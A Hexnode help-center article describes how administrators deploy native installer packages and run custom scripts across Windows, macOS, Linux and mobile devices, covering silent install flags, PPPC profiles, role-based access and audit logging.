Help Center
14 DAY FREE TRIAL
Search Close Search
Search result for "aa"
View all results

No Search Results

14 DAY FREE TRIAL
  1. Help Center
  2. Solution Framework
  3. Provisioning

Category filter

Native Installer Deployment: Managing Enterprise Apps Without Wrappers

Jump To

In enterprise environments managing large device fleets, public app stores are insufficient for deploying bespoke binaries, legacy applications, and complex configuration scripts.

This document defines the technical framework for Enterprise App Distribution and Advanced Scripting within Hexnode. It outlines how administrative teams can utilize Hexnode’s native payload delivery, execution arguments, and policy engines to manage the software lifecycle with precise control and validation.

Logical Architecture: The Native Distribution Plane

Hexnode does not rely on proprietary app wrappers. Instead, it natively supports standard installer packages and executes them using the device’s native OS components (e.g., Windows Installer, macOS Installer), coordinated through the UEM console.

  • The Enterprise App Repository: A centralized, cloud-hosted storage vault within the Hexnode tenant. Administrators upload raw installer files (MSI, EXE, PKG, DMG, APK, IPA) directly into this repository.
  • The Configuration Layer: For complex apps (like Win32 EXEs), Hexnode provides a UI to define the “Contract of Execution”—specifying silent install arguments and uninstall strings.
  • The Delivery Engine: Hexnode dispatches the download URL and execution profile to the endpoint via standard MDM channels (APNs for Apple, WNS for Windows, FCM for Android).
  • The Feedback Loop: The native Hexnode Agent executes the payload and reports the success or failure state back to the Manage > Action History console.

Custom App Distribution: OS Specifics

To ensure deterministic deployment, Hexnode natively supports advanced configurations for complex operating systems.

1. Windows App Deployment (MSI & Win32 EXE)

Hexnode treats Windows app deployments as configurable payloads rather than static files.

  • Execution Arguments: Administrators explicitly define silent installation parameters (e.g., /S /v/qn or /quiet /norestart) directly in the app configuration UI prior to deployment.
  • Uninstall Commands: Custom uninstallation strings (e.g., msiexec /x {GUID} /qn) are pre-programmed to allow seamless removal via UEM policies or remote actions.

2. macOS App Deployment (PKG, DMG, & .app)

  • Native Execution: Hexnode natively deploys and installs macOS packages.
  • PPPC Integration: To prevent users from seeing macOS security prompts during background installations, administrators must bundle the app deployment with a Privacy Preferences Policy Control (PPPC) profile. This natively pre-approves “Full Disk Access,” “Accessibility,” or other required permissions for the app’s bundle ID.
  • Gatekeeper Compliance: macOS PKGs must be signed with an Apple Developer ID and notarized by Apple to bypass Gatekeeper smoothly during silent MDM deployment.

3. Linux & Mobile (DEB, RPM, APK, IPA)

  • Linux: Hexnode supports deploying standard .deb and .rpm packages via the “Required Apps” policy, utilizing the device’s native package manager for silent background installation.
  • Mobile: iOS and Android enterprise binaries are deployed directly to the device, with Android supporting silent installation on fully managed (Device Owner) endpoints.

Advanced Scripting Orchestration

For tasks that cannot be accomplished via standard app deployment, Hexnode transforms endpoints into programmable nodes via its Execute Custom Script capability.

1. Supported Scripting Languages

Hexnode natively supports executing scripts as either immediate Remote Actions or via automated, schedule-driven Policies:

  • Windows: PowerShell (.ps1), Batch (.bat), Command (.cmd)
  • macOS: Shell Scripts (.sh), Python (.py – assuming Python is locally available)
  • Linux: Bash/Shell (.sh)

2. Execution Context & Native Wildcards

Administrators can dictate whether a script runs in the System Context (root/admin privileges) or the User Context (logged-in user privileges). Hexnode also supports injecting native dynamic wildcards into scripts to make them context-aware:

  • %devicename%: Natively injects the device’s assigned name.
  • %imei% / %serialnumber%: Injects hardware identifiers (useful for asset tagging scripts).
  • %user% / %email%: Injects the currently assigned user’s details.

3. API-Driven Automation (External CI/CD)

Enterprise development teams can utilize the Hexnode Enterprise REST API to build custom CI/CD pipelines.

  • An external runner (e.g., GitHub Actions, Jenkins) can be configured to make a POST request to Hexnode’s API to upload a new version of an Enterprise App or trigger a script execution upon a code merge.

Security, Governance & Auditing

  • Role-Based Access Control (RBAC): Using Hexnode’s Custom Roles, the ability to execute scripts or deploy apps can be restricted to Tier-3 (Admin) personnel only, preventing unauthorized technicians from executing code.
  • OS-Level Code Signing: Hexnode relies on OS-level enforcement. Windows policies can enforce SmartScreen, and macOS policies enforce Gatekeeper, ensuring that payloads must be properly signed before execution.
  • Centralized Auditing: Every script executed and app deployed via the portal is permanently logged. The Action History tracks the success/failure of the payload on the device, while Audit Reports record exactly which administrator initiated the deployment and when.

Implementation Checklist

  1. App Repository Initialization: Upload foundational enterprise binaries (VPN clients, internal tooling) directly to Apps > Enterprise Apps.
  2. Win32 Configuration: Define silent install strings (/quiet, /norestart) for all Windows EXE uploads in the Hexnode UI.
  3. PPPC Mapping (macOS): Create and deploy Custom Configuration Profiles granting Full Disk Access to required macOS administrative tools prior to deploying their respective apps.
  4. Script Validation: Test foundational PowerShell (.ps1) and Shell (.sh) scripts on a small subset of pilot devices to verify execution contexts (System vs. User) and wildcard functionality.
  5. RBAC Lockout: Navigate to Admin > Technicians and Roles and verify that Custom Roles for Helpdesk technicians have the “Execute Custom Script” and “Manage Apps” permissions explicitly disabled.
Need more help?
Image of Raise a Ticket Raise a Ticket
Image of Ask Community Ask Community
Image of Chat With us Chat With us
Solution Framework